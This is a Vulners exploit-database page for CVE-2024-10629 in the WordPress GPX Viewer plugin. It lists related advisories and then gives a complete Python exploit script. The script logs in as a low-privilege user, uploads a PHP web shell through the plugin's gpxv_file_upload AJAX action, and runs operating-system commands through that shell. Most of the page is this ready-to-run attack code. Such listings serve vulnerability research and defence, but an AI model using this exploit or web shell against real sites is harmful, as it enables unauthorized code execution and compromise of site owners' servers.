Vulners
Lucene search
WordPress GPX Viewer 2.2.8 Arbitrary File Creation Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for CVE-2024-10629 | 12 Nov 202416:36 | – | githubexploit |
| Exploit for CVE-2024-10629 | 9 Mar 202519:26 | – | githubexploit |
 | CVE-2024-10629 | 13 Nov 202402:07 | – | circl |
 | WordPress plugin GPX Viewer 安全漏洞 | 13 Nov 202400:00 | – | cnnvd |
 | CVE-2024-10629 | 13 Nov 202402:02 | – | cve |
 | CVE-2024-10629 GPX Viewer <= 2.2.9 - Authenticated (Subscriber+) Arbitrary File Creation | 13 Nov 202402:02 | – | cvelist |
 | CVE-2024-10629 | 13 Nov 202402:15 | – | nvd |
 | WordPress GPX Viewer 2.2.8 Arbitrary File Creation | 11 Mar 202500:00 | – | packetstormnews |
 | WordPress GPX Viewer Plugin <= 2.2.9 is vulnerable to Arbitrary File Upload | 12 Nov 202400:00 | – | patchstack |
| WordPress GPX Viewer plugin <= 2.2.9 - Authenticated (Subscriber+) Arbitrary File Creation vulnerability | 12 Nov 202418:20 | – | patchstack |
10
import argparse
import requests
from requests.sessions import Session
import time
banner = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║██╔═████╗██╔════╝ ╚════██╗██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║██║██╔██║███████╗ █████╔╝╚██████║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║████╔╝██║██╔═══██╗██╔═══╝ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║╚██████╔╝╚██████╔╝███████╗ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚════╝
Exploit by : Nxploit \ Khaled alEnazi
"""
print(banner)
def parse_arguments():
parser = argparse.ArgumentParser(description='Exploit a vulnerability in a WordPress plugin allowing file upload.')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-un', '--username', required=True, help='Username for login')
parser.add_argument('-p', '--password', required=True, help='Password for login')
return parser.parse_args()
def create_session():
session = Session()
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
session.headers.update({"User-Agent": user_agent})
return session
def get_wordpress_version(url):
plugin_readme_url = f'{url}/wp-content/plugins/gpx-viewer/readme.txt'
response = requests.get(plugin_readme_url, verify=False)
time.sleep(2) # Wait for 2 seconds
if response.status_code == 200:
for line in response.text.splitlines():
if line.startswith("Stable tag:"):
version = line.split(":")[1].strip()
return version
return None
def check_version(version):
vulnerable_version = "2.2.8"
return version and version <= vulnerable_version
def login(session, url, username, password):
login_url = f'{url}/wp-login.php'
response = session.post(login_url, data={
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log In'
}, verify=False)
time.sleep(2) # Wait for 2 seconds
return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
def upload_payload(session, url):
upload_url = f'{url}/wp-admin/admin-ajax.php'
payload = '''<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>'''
boundary = '---------------------------267455711524671334248015039'
body = f"""
--{boundary}
Content-Disposition: form-data; name="action"
gpxv_file_upload
--{boundary}
Content-Disposition: form-data; name="category"
uncategorized
--{boundary}
Content-Disposition: form-data; name="filename"
nxploit_exploit.php
--{boundary}
Content-Disposition: form-data; name="gpx"
{payload}
--{boundary}--
"""
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
}
response = session.post(upload_url, data=body, headers=headers)
time.sleep(2) # Wait for 2 seconds
return response.status_code == 200
def check_shell(session, url):
shell_url = f'{url}/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php'
response = session.get(shell_url, verify=False)
time.sleep(2) # Wait for 2 seconds
if response.status_code == 200:
print("[+] Shell uploaded successfully.")
print(f"[+] Shell URL: {shell_url}")
return shell_url
print("[-] Shell upload failed.")
return None
def execute_command(session, shell_url, cmd):
response = session.get(f'{shell_url}?cmd={cmd}', verify=False)
print(f"[+] Command output:\n{shell_url}?cmd={cmd}\n{response.text}")
print("\nExample commands:\nls = show files\nuname -a = show system information\n")
def main():
args = parse_arguments()
session = create_session()
version = get_wordpress_version(args.url)
if version:
print(f"[+] WordPress plugin version: {version}")
if check_version(version):
print("[+] Vulnerable version detected. Proceeding with exploitation...")
else:
print("[-] Version not vulnerable. Exiting.")
return
else:
print("[-] Could not determine plugin version. Exiting.")
return
if login(session, args.url, args.username, args.password):
print("[+] Logged in successfully.")
if upload_payload(session, args.url):
print("[+] Shell uploaded. Checking shell...")
shell_url = check_shell(session, args.url)
if shell_url:
execute_command(session, shell_url, "ls")
else:
print("[-] Failed to upload shell.")
else:
print("[-] Failed to log in.")
if __name__ == "__main__":
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.8
EPSS0.57642
SSVC